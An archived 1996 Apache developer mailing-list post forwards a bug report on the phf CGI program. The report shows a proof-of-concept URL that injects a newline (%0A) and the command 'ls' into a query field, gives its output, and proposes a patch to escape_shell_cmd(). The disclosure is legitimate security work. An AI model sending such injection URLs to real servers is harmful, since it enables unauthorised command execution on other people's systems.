You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@httpd.apache.org by Rob Hartill <ha...@hyperreal.com> on 1996/02/09 05:45:51 UTC
Security problem in phf (fwd)
cgi-src/phf.c bye bye ?
Forwarded message:
> From jmyers@marigold.eecs.nwu.edu Mon Feb 5 17:13:11 1996
> Message-Id: <19...@marigold.eecs.nwu.edu>
> Subject: Security problem in phf
> To: jbrowne@uiuc.edu, apache-bugs@apache.org, httpd@hoohoo.ncsa.uiuc.edu
> Date: Mon, 5 Feb 1996 16:51:05 -0600 (CST)
> From: Jennifer Myers <jm...@marigold.eecs.nwu.edu>
> X-Mailer: ELM [version 2.4 PL25]
> MIME-Version: 1.0
> Content-Type: text/plain; charset=US-ASCII
> Content-Transfer-Encoding: 7bit
>
> Hello,
>
> Both the NCSA httpd and Apache httpd distributions include a CGI
> program "phf" which is a forms-based interface to Ph servers written
> by Jim Browne <jb...@uiuc.edu>.
>
> "phf" can be made to execute commands by inserting "%0A" (newline) into the
> URL of a phf query, followed by whatever command you wish to execute.
>
> Example:
>
> http://hoohoo.ncsa.uiuc.edu:80/cgi-bin/phf?Jserver=ns.uiuc.edu&Qalias=jbrowne&Qname=&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip=%0Als
> ^^^^^
>
> Output:
> ------
> Query Results
>
> /usr/local/bin/ph -m -s ns.uiuc.edu alias=jbrowne slip= ls
>
> -507:slip:unknown field.
> 500:Did not understand query.
> AA
> AA.pl
> archie
> calendar
> cgi-dump
> change-passwd
> date
> donothing
> [...]
> -------
>
> The fix is to add \x0A to the characters which escape_shell_cmd() in
> util.c will escape:
>
> - if(ind("&;`'\"|*?~<>^()[]{}$\\",cmd[x]) != -1){
> + if(ind("&;`'\"|*?~<>^()[]{}$\\\x0A",cmd[x]) != -1){
>
>
> Thanks,
> Jennifer Myers
>